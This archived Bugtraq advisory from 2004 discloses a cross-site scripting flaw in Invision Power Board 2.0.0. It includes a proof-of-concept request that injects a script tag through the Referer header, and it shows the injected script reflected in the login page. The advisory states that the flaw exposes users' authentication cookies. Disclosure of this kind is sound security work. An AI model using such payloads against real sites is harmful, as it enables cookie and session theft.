[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: [MAXPATROL Security Advisories] Cross site scripting in Invision Power Board
From: "Alexander Antipov" <Antipov () SecurityLab ! ru>
Date: 2004-10-05 18:53:12
Message-ID: 200410051853.i95IrSQU033760 () border ! zero ! ru
[Download RAW message or body]
[MAXPATROL Security Advisories] Cross site scripting in Invision Power Board
Date: 5.10.2004
Severity: Low
Application: Invision Power Board v2.0.0
Platform: PHP
I. DESCRIPTION
An input validation vulnerability was found in Invision Power Board. A
remote user can conduct Cross site scripting attack.
1.
GET /index.php?s=5875d919a790a7c429c955e4d65b5d54&act=Login&CODE=00 HTTP/1.0
Referer: "'/><script>alert()</script>
Result
<...>
index.php?s=7ff7c2ec2bc7f6e349b326dcee4cf41c&act=Login&CODE=01"
method="post" name="LOGIN" onsubmit="return ValidateForm()">
<input type="hidden" name="referer" value="\"\'/><script>alert()</script>"
/>
<...>
II. IMPACT
A remote user can access the target user's cookies (including authentication
cookies).
III. SOLUTION
Not available currently.
IV. VENDOR FIX/RESPONSE
n/a
V. CREDIT
This vulnerability was discovered by Positive Technologies using MaxPatrol
(www.maxpatrol.com) - intellectual professional security scanner. It is able
to detect a substantial amount of vulnerabilities not published yet.
MaxPatrol's intelligent algorithms are also capable to detect a lot of
vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP
Response splitting).
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic